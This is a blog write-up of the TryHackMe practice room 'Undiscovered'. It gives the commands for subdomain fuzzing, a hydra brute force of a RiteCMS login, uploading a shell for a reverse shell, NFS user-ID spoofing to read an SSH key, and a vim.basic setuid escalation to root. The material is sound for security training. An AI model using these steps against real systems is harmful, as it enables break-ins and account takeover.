Blue Arachnid

Penetration Tester and Security Reseracher

TryHackme

Undiscovered – TryHackMe

by Mohamed Munazzir

Write-up for Tryhackme room Undiscovered.

Difficulty Level – Medium

Start with nmap scan as usual.

nmap -A -oN initial $IP

after that i tried directory brute-force with gobuster but no luck, since we add the domain name to our “/etc/hosts” maybe its something to do with sub-domains.

using “wfuzz” we can brute-force subdomain

wfuzz -c -f sub-lists.txt -w /opt/SecLists-master/Discovery/DNS/subdomains-top1million-5000.txt -u 'http://undiscovered.thm' -H "Host: FUZZ.undiscovered.thm" --hc --hw 290

now we need to add those sub domain to “/etc/hosts” to access.

when we go to manager.undiscovered.thm we can see CMS type and version, with those details we can search for exploit available in Exploit Database

i found these 2 vulnerable exploits.

  1. RiteCMS 2.2.1 – Remote Code Execution (Authenticated)
  2. RiteCMS 2.2.1 – Authenticated Remote Code Execution

according to exploit database if we able to access “http://website/CMS” we can find login panel with luck using default credential we can login.

so to do that i wrote bash script,

#!/bin/bash

cat sub-lists.txt | while read line; do 
        curl "http://$line.undiscovered.thm/cms"
done

we found the correct URL but unfortunately default password will not work so need to brute-force with hydra. 

hydra -l admin -P /opt/rockyou.txt -f deliver.undiscovered.thm http-post-form "/cms/index.php:username=^USER^&userpw=^PASS^:User unknown or password wrong"

we found the password now we can login and find a way to upload shell file and get reverse shell.

Administration => File Manager => Upload file

clicking file will execute the file and we get the reverse shell.

we can enumerate with linpeas.sh we can see this detail.

if we create william user in our PC using same id we could mount the home with VM

sudo adduser -u 3003 william

to mount the folder

sudo mount -t nfs undiscovered.thm:/home/william/ /home/william/

first change william home folder executable by all.

chmod 777 /home/william

the “script” binary is SUID when we execute it read “admin.sh” when we analyze it we can notice we can give a parameter(file to read) since it belong to leonard we can try to read leonard ssh key.

now login as user leonard

ssh -i id_rsa leonard@$IP

Privilege Escalation

again run the linpeas get more details as user leonard

“vim.basic” look suspicious so i went to checked the GTFOBINS, with suggested method we can escalate.

/usr/bin/vim.basic -c ':py3 import os; os.setuid(0); os.execl("/bin/sh", "sh", "-c", "reset; exec sh")'

Finally Root!!

Hack the planet, spread the knowledge!!

Share this post

Related posts

Wreath – TryHackMe

Broker – TryHackMe

EnPass – TryHackMe